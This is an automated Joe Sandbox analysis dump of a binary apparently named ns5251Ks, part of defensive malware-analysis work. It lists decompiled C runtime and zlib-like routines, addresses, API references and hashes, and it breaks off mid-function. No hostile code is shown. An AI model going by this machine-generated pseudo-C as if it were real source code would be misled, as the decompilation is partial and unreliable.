                                                					E0040D6E0(_t22, 0xc);
                                                					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                					_t8 = _t28 + 0x6c; // 0x6c
                                                					_t26 =  *0x422f18; // 0x422e40
                                                					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                					 *(_t29 - 4) = 0xfffffffe;
                                                					E004147A2();
                                                				} else {
                                                					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                						goto L6;
                                                					} else {
                                                						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                					}
                                                				}
                                                				if(_t28 == 0) {
                                                					E0040E79A(_t25, _t26, 0x20);
                                                				}
                                                				return E0040E21D(_t28);
                                                			}







                                                0x00414738
                                                0x00414738
                                                0x00414738
                                                0x00414738
                                                0x00414738
                                                0x0041473a
                                                0x0041473f
                                                0x00414749
                                                0x0041474b
                                                0x00414753
                                                0x00414777
                                                0x00414779
                                                0x0041477f
                                                0x00414783
                                                0x00414786
                                                0x00414791
                                                0x00414794
                                                0x0041479b
                                                0x00414755
                                                0x00414755
                                                0x00414759
                                                0x00000000
                                                0x0041475b
                                                0x00414760
                                                0x00414760
                                                0x00414759
                                                0x00414765
                                                0x00414769
                                                0x0041476e
                                                0x00414776

                                                APIs
                                                • __getptd.LIBCMT ref: 00414744
                                                  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                • __getptd.LIBCMT ref: 0041475B
                                                • __amsg_exit.LIBCMT ref: 00414769
                                                • __lock.LIBCMT ref: 00414779
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                • String ID: @.B
                                                • API String ID: 3521780317-470711618
                                                • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                				intOrPtr _v8;
                                                				void* _t16;
                                                				void* _t17;
                                                				intOrPtr _t19;
                                                				void* _t21;
                                                				signed int _t22;
                                                				intOrPtr* _t27;
                                                				intOrPtr _t39;
                                                				intOrPtr _t40;
                                                				intOrPtr _t50;
                                                
                                                				_t37 = __edx;
                                                				_push(8);
                                                				_push(0x421140);
                                                				E0040E1D8(__ebx, __edi, __esi);
                                                				_t39 = _a4;
                                                				_t50 = _t39;
                                                				_t51 = _t50 != 0;
                                                				if(_t50 != 0) {
                                                					E0040FB29(_t39);
                                                					_v8 = 0;
                                                					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                					_t16 = E0040FA20(__edx, _t39, _t39);
                                                					__eflags = _t16 - 0xffffffff;
                                                					if(_t16 == 0xffffffff) {
                                                						L6:
                                                						_t17 = 0x4227e0;
                                                					} else {
                                                						_t21 = E0040FA20(__edx, _t39, _t39);
                                                						__eflags = _t21 - 0xfffffffe;
                                                						if(_t21 == 0xfffffffe) {
                                                							goto L6;
                                                						} else {
                                                							_t22 = E0040FA20(__edx, _t39, _t39);
                                                							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                						}
                                                					}
                                                					_t9 = _t17 + 4; // 0xa80
                                                					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                					_v8 = 0xfffffffe;
                                                					E0040C735(_t39);
                                                					_t19 = 0;
                                                					__eflags = 0;
                                                				} else {
                                                					_t27 = E0040BFC1(_t51);
                                                					_t40 = 0x16;
                                                					 *_t27 = _t40;
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					E0040E744(__edx, _t40, 0);
                                                					_t19 = _t40;
                                                				}
                                                				return E0040E21D(_t19);
                                                			}













                                                0x0040c73d
                                                0x0040c690
                                                0x0040c692
                                                0x0040c697
                                                0x0040c69e
                                                0x0040c6a3
                                                0x0040c6a8
                                                0x0040c6aa
                                                0x0040c6c8
                                                0x0040c6ce
                                                0x0040c6d1
                                                0x0040c6d6
                                                0x0040c6dc
                                                0x0040c6df
                                                0x0040c70f
                                                0x0040c70f
                                                0x0040c6e1
                                                0x0040c6e2
                                                0x0040c6e8
                                                0x0040c6eb
                                                0x00000000
                                                0x0040c6ed
                                                0x0040c6ee
                                                0x0040c70b
                                                0x0040c70b
                                                0x0040c6eb
                                                0x0040c714
                                                0x0040c71b
                                                0x0040c71e
                                                0x0040c725
                                                0x0040c72a
                                                0x0040c72a
                                                0x0040c6ac
                                                0x0040c6ac
                                                0x0040c6b3
                                                0x0040c6b4
                                                0x0040c6b6
                                                0x0040c6b7
                                                0x0040c6b8
                                                0x0040c6b9
                                                0x0040c6ba
                                                0x0040c6bb
                                                0x0040c6c3
                                                0x0040c6c3
                                                0x0040c731

                                                APIs
                                                • __lock_file.LIBCMT ref: 0040C6C8
                                                • __fileno.LIBCMT ref: 0040C6D6
                                                • __fileno.LIBCMT ref: 0040C6E2
                                                • __fileno.LIBCMT ref: 0040C6EE
                                                • __fileno.LIBCMT ref: 0040C6FE
                                                  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                • String ID:
                                                • API String ID: 2805327698-0
                                                • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 89%
                                                			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				signed int _t15;
                                                				LONG* _t21;
                                                				long _t23;
                                                				void* _t31;
                                                				LONG* _t33;
                                                				void* _t34;
                                                				void* _t35;
                                                
                                                				_t35 = __eflags;
                                                				_t29 = __edx;
                                                				_t25 = __ebx;
                                                				_push(0xc);
                                                				_push(0x421490);
                                                				E0040E1D8(__ebx, __edi, __esi);
                                                				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                				_t15 =  *0x422e34; // 0xfffffffe
                                                				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                					E0040D6E0(_t25, 0xd);
                                                					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                					_t33 =  *(_t31 + 0x68);
                                                					 *(_t34 - 0x1c) = _t33;
                                                					__eflags = _t33 -  *0x422d38; // 0x2d41648
                                                					if(__eflags != 0) {
                                                						__eflags = _t33;
                                                						if(_t33 != 0) {
                                                							_t23 = InterlockedDecrement(_t33);
                                                							__eflags = _t23;
                                                							if(_t23 == 0) {
                                                								__eflags = _t33 - 0x422910;
                                                								if(__eflags != 0) {
                                                									_push(_t33);
                                                									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                								}
                                                							}
                                                						}
                                                						_t21 =  *0x422d38; // 0x2d41648
                                                						 *(_t31 + 0x68) = _t21;
                                                						_t33 =  *0x422d38; // 0x2d41648
                                                						 *(_t34 - 0x1c) = _t33;
                                                						InterlockedIncrement(_t33);
                                                					}
                                                					 *(_t34 - 4) = 0xfffffffe;
                                                					E00414067();
                                                				} else {
                                                					_t33 =  *(_t31 + 0x68);
                                                				}
                                                				if(_t33 == 0) {
                                                					E0040E79A(_t29, _t31, 0x20);
                                                				}
                                                				return E0040E21D(_t33);
                                                			}










                                                0x00413fcc
                                                0x00413fcc
                                                0x00413fcc
                                                0x00413fcc
                                                0x00413fce
                                                0x00413fd3
                                                0x00413fdd
                                                0x00413fdf
                                                0x00413fe7
                                                0x00414008
                                                0x0041400e
                                                0x00414012
                                                0x00414015
                                                0x00414018
                                                0x0041401e
                                                0x00414020
                                                0x00414022
                                                0x00414025
                                                0x0041402b
                                                0x0041402d
                                                0x0041402f
                                                0x00414035
                                                0x00414037
                                                0x00414038
                                                0x0041403d
                                                0x00414035
                                                0x0041402d
                                                0x0041403e
                                                0x00414043
                                                0x00414046
                                                0x0041404c
                                                0x00414050
                                                0x00414050
                                                0x00414056
                                                0x0041405d
                                                0x00413fef
                                                0x00413fef
                                                0x00413fef
                                                0x00413ff4
                                                0x00413ff8
                                                0x00413ffd
                                                0x00414005

                                                APIs
                                                • __getptd.LIBCMT ref: 00413FD8
                                                  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                • __amsg_exit.LIBCMT ref: 00413FF8
                                                • __lock.LIBCMT ref: 00414008
                                                • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                • InterlockedIncrement.KERNEL32(02D41648), ref: 00414050
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                • String ID:
                                                • API String ID: 4271482742-0
                                                • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 65%
                                                			E00413610() {
                                                				signed long long _v12;
                                                				signed int _v20;
                                                				signed long long _v28;
                                                				signed char _t8;
                                                
                                                				_t8 = GetModuleHandleA("KERNEL32");
                                                				if(_t8 == 0) {
                                                					L6:
                                                					_v20 =  *0x41fb50;
                                                					_v28 =  *0x41fb48;
                                                					asm("fsubr qword [ebp-0x18]");
                                                					_v12 = _v28 / _v20 * _v20;
                                                					asm("fld1");
                                                					asm("fcomp qword [ebp-0x8]");
                                                					asm("fnstsw ax");
                                                					if((_t8 & 0x00000005) != 0) {
                                                						return 0;
                                                					} else {
                                                						return 1;
                                                					}
                                                				} else {
                                                					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                					if(__eax == 0) {
                                                						goto L6;
                                                					} else {
                                                						_push(0);
                                                						return __eax;
                                                					}
                                                				}
                                                			}







                                                0x00413615
                                                0x0041361d
                                                0x00413634
                                                0x004135e0
                                                0x004135e9
                                                0x004135f5
                                                0x004135f8
                                                0x004135fb
                                                0x004135fd
                                                0x00413600
                                                0x00413605
                                                0x0041360f
                                                0x00413607
                                                0x0041360b
                                                0x0041360b
                                                0x0041361f
                                                0x00413625
                                                0x0041362d
                                                0x00000000
                                                0x0041362f
                                                0x0041362f
                                                0x00413633
                                                0x00413633
                                                0x0041362d

                                                APIs
                                                • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                • API String ID: 1646373207-3105848591
                                                • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E0040C748(void* __edx, void* __esi, char _a4) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __ebp;
                                                				signed int _t70;
                                                				signed int _t71;
                                                				intOrPtr _t73;
                                                				signed int _t75;
                                                				signed int _t81;
                                                				char _t82;
                                                				signed int _t84;
                                                				intOrPtr* _t86;
                                                				signed int _t87;
                                                				intOrPtr* _t90;
                                                				signed int _t92;
                                                				signed int _t94;
                                                				void* _t96;
                                                				signed char _t98;
                                                				signed int _t99;
                                                				intOrPtr _t102;
                                                				signed int _t103;
                                                				intOrPtr* _t104;
                                                				signed int _t111;
                                                				signed int _t114;
                                                				intOrPtr _t115;
                                                
                                                				_t105 = __esi;
                                                				_t97 = __edx;
                                                				_t104 = _a4;
                                                				_t87 = 0;
                                                				_t121 = _t104;
                                                				if(_t104 != 0) {
                                                					_t70 = E0040FA20(__edx, _t104, _t104);
                                                					__eflags =  *(_t104 + 4);
                                                					_v8 = _t70;
                                                					if(__eflags < 0) {
                                                						 *(_t104 + 4) = 0;
                                                					}
                                                					_push(1);
                                                					_push(_t87);
                                                					_push(_t70);
                                                					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                					__eflags = _t71 - _t87;
                                                					_v12 = _t71;
                                                					if(_t71 < _t87) {
                                                						L2:
                                                						return _t71 | 0xffffffff;
                                                					} else {
                                                						_t98 =  *(_t104 + 0xc);
                                                						__eflags = _t98 & 0x00000108;
                                                						if((_t98 & 0x00000108) != 0) {
                                                							_t73 =  *_t104;
                                                							_t92 =  *(_t104 + 8);
                                                							_push(_t105);
                                                							_v16 = _t73 - _t92;
                                                							__eflags = _t98 & 0x00000003;
                                                							if((_t98 & 0x00000003) == 0) {
                                                								__eflags = _t98;
                                                								if(__eflags < 0) {
                                                									L15:
                                                									__eflags = _v12 - _t87;
                                                									if(_v12 != _t87) {
                                                										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                											L40:
                                                											_t75 = _v16 + _v12;
                                                											__eflags = _t75;
                                                											L41:
                                                											return _t75;
                                                										}
                                                										_t99 =  *(_t104 + 4);
                                                										__eflags = _t99 - _t87;
                                                										if(_t99 != _t87) {
                                                											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                											_a4 = _t73 - _t92 + _t99;
                                                											_t111 = (_v8 & 0x0000001f) << 6;
                                                											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                											if(__eflags == 0) {
                                                												L39:
                                                												_t66 =  &_v12;
                                                												 *_t66 = _v12 - _a4;
                                                												__eflags =  *_t66;
                                                												goto L40;
                                                											}
                                                											_push(2);
                                                											_push(0);
                                                											_push(_v8);
                                                											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                											if(__eflags != 0) {
                                                												_push(0);
                                                												_push(_v12);
                                                												_push(_v8);
                                                												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                												__eflags = _t81;
                                                												if(_t81 >= 0) {
                                                													_t82 = 0x200;
                                                													__eflags = _a4 - 0x200;
                                                													if(_a4 > 0x200) {
                                                														L35:
                                                														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                														L36:
                                                														_a4 = _t82;
                                                														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                														L37:
                                                														if(__eflags != 0) {
                                                															_t63 =  &_a4;
                                                															 *_t63 = _a4 + 1;
                                                															__eflags =  *_t63;
                                                														}
                                                														goto L39;
                                                													}
                                                													_t94 =  *(_t104 + 0xc);
                                                													__eflags = _t94 & 0x00000008;
                                                													if((_t94 & 0x00000008) == 0) {
                                                														goto L35;
                                                													}
                                                													__eflags = _t94 & 0x00000400;
                                                													if((_t94 & 0x00000400) == 0) {
                                                														goto L36;
                                                													}
                                                													goto L35;
                                                												}
                                                												L31:
                                                												_t75 = _t81 | 0xffffffff;
                                                												goto L41;
                                                											}
                                                											_t84 =  *(_t104 + 8);
                                                											_t96 = _a4 + _t84;
                                                											while(1) {
                                                												__eflags = _t84 - _t96;
                                                												if(_t84 >= _t96) {
                                                													break;
                                                												}
                                                												__eflags =  *_t84 - 0xa;
                                                												if( *_t84 == 0xa) {
                                                													_t44 =  &_a4;
                                                													 *_t44 = _a4 + 1;
                                                													__eflags =  *_t44;
                                                												}
                                                												_t84 = _t84 + 1;
                                                												__eflags = _t84;
                                                											}
                                                											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                											goto L37;
                                                										}
                                                										_v16 = _t87;
                                                										goto L40;
                                                									}
                                                									_t75 = _v16;
                                                									goto L41;
                                                								}
                                                								_t81 = E0040BFC1(__eflags);
                                                								 *_t81 = 0x16;
                                                								goto L31;
                                                							}
                                                							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                							_t114 = (_v8 & 0x0000001f) << 6;
                                                							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                								goto L15;
                                                							}
                                                							_t103 = _t92;
                                                							__eflags = _t103 - _t73;
                                                							if(_t103 >= _t73) {
                                                								goto L15;
                                                							}
                                                							_t115 = _t73;
                                                							do {
                                                								__eflags =  *_t103 - 0xa;
                                                								if( *_t103 == 0xa) {
                                                									_v16 = _v16 + 1;
                                                									_t87 = 0;
                                                									__eflags = 0;
                                                								}
                                                								_t103 = _t103 + 1;
                                                								__eflags = _t103 - _t115;
                                                							} while (_t103 < _t115);
                                                							goto L15;
                                                						}
                                                						return _t71 -  *(_t104 + 4);
                                                					}
                                                				}
                                                				_t86 = E0040BFC1(_t121);
                                                				_push(0);
                                                				_push(0);
                                                				_push(0);
                                                				_push(0);
                                                				_push(0);
                                                				 *_t86 = 0x16;
                                                				_t71 = E0040E744(__edx, _t104, __esi);
                                                				goto L2;
                                                			}






























                                                0x0040c748
                                                0x0040c748
                                                0x0040c752
                                                0x0040c755
                                                0x0040c757
                                                0x0040c759
                                                0x0040c77c
                                                0x0040c781
                                                0x0040c785
                                                0x0040c788
                                                0x0040c78a
                                                0x0040c78a
                                                0x0040c78d
                                                0x0040c78f
                                                0x0040c790
                                                0x0040c791
                                                0x0040c799
                                                0x0040c79b
                                                0x0040c79e
                                                0x0040c773
                                                0x00000000
                                                0x0040c7a0
                                                0x0040c7a0
                                                0x0040c7a3
                                                0x0040c7a9
                                                0x0040c7b3
                                                0x0040c7b5
                                                0x0040c7b8
                                                0x0040c7bd
                                                0x0040c7c0
                                                0x0040c7c3
                                                0x0040c806
                                                0x0040c808
                                                0x0040c7f9
                                                0x0040c7f9
                                                0x0040c7fc
                                                0x0040c81a
                                                0x0040c81e
                                                0x0040c8d8
                                                0x0040c8de
                                                0x0040c8de
                                                0x0040c8e0
                                                0x00000000
                                                0x0040c8e0
                                                0x0040c824
                                                0x0040c827
                                                0x0040c829
                                                0x0040c843
                                                0x0040c84a
                                                0x0040c84f
                                                0x0040c852
                                                0x0040c857
                                                0x0040c8d2
                                                0x0040c8d5
                                                0x0040c8d5
                                                0x0040c8d5
                                                0x00000000
                                                0x0040c8d5
                                                0x0040c859
                                                0x0040c85b
                                                0x0040c85d
                                                0x0040c868
                                                0x0040c86b
                                                0x0040c88d
                                                0x0040c88f
                                                0x0040c892
                                                0x0040c895
                                                0x0040c89d
                                                0x0040c89f
                                                0x0040c8a6
                                                0x0040c8ab
                                                0x0040c8ae
                                                0x0040c8c0
                                                0x0040c8c0
                                                0x0040c8c3
                                                0x0040c8c3
                                                0x0040c8c8
                                                0x0040c8cd
                                                0x0040c8cd
                                                0x0040c8cf
                                                0x0040c8cf
                                                0x0040c8cf
                                                0x0040c8cf
                                                0x00000000
                                                0x0040c8cd
                                                0x0040c8b0
                                                0x0040c8b3
                                                0x0040c8b6
                                                0x00000000
                                                0x00000000
                                                0x0040c8b8
                                                0x0040c8be
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040c8be
                                                0x0040c8a1
                                                0x0040c8a1
                                                0x00000000
                                                0x0040c8a1
                                                0x0040c86d
                                                0x0040c873
                                                0x0040c880
                                                0x0040c880
                                                0x0040c882
                                                0x00000000
                                                0x00000000
                                                0x0040c877
                                                0x0040c87a
                                                0x0040c87c
                                                0x0040c87c
                                                0x0040c87c
                                                0x0040c87c
                                                0x0040c87f
                                                0x0040c87f
                                                0x0040c87f
                                                0x0040c884
                                                0x00000000
                                                0x0040c884
                                                0x0040c82b
                                                0x00000000
                                                0x0040c82b
                                                0x0040c7fe
                                                0x00000000
                                                0x0040c7fe
                                                0x0040c80a
                                                0x0040c80f
                                                0x00000000
                                                0x0040c80f
                                                0x0040c7ce
                                                0x0040c7d8
                                                0x0040c7db
                                                0x0040c7e0
                                                0x00000000
                                                0x00000000
                                                0x0040c7e2
                                                0x0040c7e4
                                                0x0040c7e6
                                                0x00000000
                                                0x00000000
                                                0x0040c7e8
                                                0x0040c7ea
                                                0x0040c7ea
                                                0x0040c7ed
                                                0x0040c7ef
                                                0x0040c7f2
                                                0x0040c7f2
                                                0x0040c7f2
                                                0x0040c7f4
                                                0x0040c7f5
                                                0x0040c7f5
                                                0x00000000
                                                0x0040c7ea
                                                0x00000000
                                                0x0040c7ab
                                                0x0040c79e
                                                0x0040c75b
                                                0x0040c760
                                                0x0040c761
                                                0x0040c762
                                                0x0040c763
                                                0x0040c764
                                                0x0040c765
                                                0x0040c76b
                                                0x00000000

                                                APIs
                                                • __fileno.LIBCMT ref: 0040C77C
                                                • __locking.LIBCMT ref: 0040C791
                                                  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                • String ID:
                                                • API String ID: 2395185920-0
                                                • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 97%
                                                			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t30;
                                                				signed int _t31;
                                                				signed int _t32;
                                                				signed int _t33;
                                                				signed int _t35;
                                                				signed int _t39;
                                                				void* _t42;
                                                				intOrPtr _t43;
                                                				void* _t45;
                                                				signed int _t48;
                                                				signed int* _t53;
                                                				void* _t54;
                                                				void* _t55;
                                                				void* _t57;
                                                
                                                				_t54 = __ebp;
                                                				_t45 = __edx;
                                                				_t42 = __ebx;
                                                				_t53 = _a4;
                                                				if(_t53 == 0) {
                                                					L40:
                                                					_t31 = _t30 | 0xffffffff;
                                                					__eflags = _t31;
                                                					return _t31;
                                                				} else {
                                                					_t43 = _a12;
                                                					if(_t43 == 2) {
                                                						goto L40;
                                                					} else {
                                                						_t30 = _t53[0xe];
                                                						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                							goto L40;
                                                						} else {
                                                							_t48 = _a8;
                                                							if(_t53[0x17] != 0x77) {
                                                								__eflags = _t43 - 1;
                                                								if(_t43 == 1) {
                                                									_t48 = _t48 + _t53[0x1a];
                                                									__eflags = _t48;
                                                								}
                                                								__eflags = _t48;
                                                								if(_t48 < 0) {
                                                									goto L39;
                                                								} else {
                                                									__eflags = _t53[0x16];
                                                									if(__eflags == 0) {
                                                										_t33 = _t53[0x1a];
                                                										__eflags = _t48 - _t33;
                                                										if(_t48 < _t33) {
                                                											_t30 = E004054F0(_t42, _t54, _t53);
                                                											_t55 = _t55 + 4;
                                                											__eflags = _t30;
                                                											if(_t30 < 0) {
                                                												goto L39;
                                                											} else {
                                                												goto L27;
                                                											}
                                                										} else {
                                                											_t48 = _t48 - _t33;
                                                											L27:
                                                											__eflags = _t48;
                                                											if(_t48 == 0) {
                                                												L38:
                                                												return _t53[0x1a];
                                                											} else {
                                                												__eflags = _t53[0x12];
                                                												if(_t53[0x12] != 0) {
                                                													L30:
                                                													__eflags = _t53[0x1b] - 0xffffffff;
                                                													if(_t53[0x1b] != 0xffffffff) {
                                                														_t53[0x1a] = _t53[0x1a] + 1;
                                                														_t48 = _t48 - 1;
                                                														__eflags = _t53[0x1c];
                                                														_t53[0x1b] = 0xffffffff;
                                                														if(_t53[0x1c] != 0) {
                                                															_t53[0xe] = 1;
                                                														}
                                                													}
                                                													__eflags = _t48;
                                                													if(_t48 <= 0) {
                                                														goto L38;
                                                													} else {
                                                														while(1) {
                                                															_t35 = 0x4000;
                                                															__eflags = _t48 - 0x4000;
                                                															if(_t48 < 0x4000) {
                                                																_t35 = _t48;
                                                															}
                                                															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                															_t55 = _t55 + 0xc;
                                                															__eflags = _t30;
                                                															if(_t30 <= 0) {
                                                																goto L39;
                                                															}
                                                															_t48 = _t48 - _t30;
                                                															__eflags = _t48;
                                                															if(_t48 > 0) {
                                                																continue;
                                                															} else {
                                                																goto L38;
                                                															}
                                                															goto L41;
                                                														}
                                                														goto L39;
                                                													}
                                                												} else {
                                                													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                													_t55 = _t55 + 4;
                                                													_t53[0x12] = _t30;
                                                													__eflags = _t30;
                                                													if(_t30 == 0) {
                                                														goto L39;
                                                													} else {
                                                														goto L30;
                                                													}
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										_push(0);
                                                										_push(_t48);
                                                										_push(_t53[0x10]);
                                                										_t53[0x1b] = 0xffffffff;
                                                										_t53[1] = 0;
                                                										 *_t53 = _t53[0x11];
                                                										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                										__eflags = _t30;
                                                										if(_t30 < 0) {
                                                											goto L39;
                                                										} else {
                                                											_t53[0x1a] = _t48;
                                                											_t53[0x19] = _t48;
                                                											return _t48;
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								if(_t43 == 0) {
                                                									_t48 = _t48 - _t53[0x19];
                                                								}
                                                								if(_t48 < 0) {
                                                									L39:
